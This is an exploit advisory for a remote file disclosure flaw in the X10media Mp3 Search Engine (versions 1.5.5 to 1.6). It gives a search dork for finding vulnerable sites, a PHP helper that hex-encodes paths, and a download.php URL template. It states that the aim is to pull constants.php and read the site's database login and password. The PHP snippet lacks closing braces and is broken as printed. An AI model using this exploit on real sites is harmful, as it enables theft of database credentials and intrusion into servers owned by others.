################# ~THUNDER ################################################################

    ~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability

    ~Founded by : THUNDER <t4h[at]hotmail.fr>
    ~Dork: "This search engine is in no way intended for illegal downloads. "
    ~File : Download.php


to read files you need to encode the url, so you can use this php code :
//Encode URL ** THUNDER **
function enc($string){
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    return $hex;
$thunder = $_GET[t];
echo enc($thunder);

How to use :[Url]
Ex :
##### ~Exploit ############################################################################

   http://www.target.com/[path]/download.php?url=[Encoded url]

Example :
let's download the constants.php file wich contains the database login and password .
the file will be downloaded as .mp3 exstension .


Open the downloaded file with any text editor... ,and you got the database .           
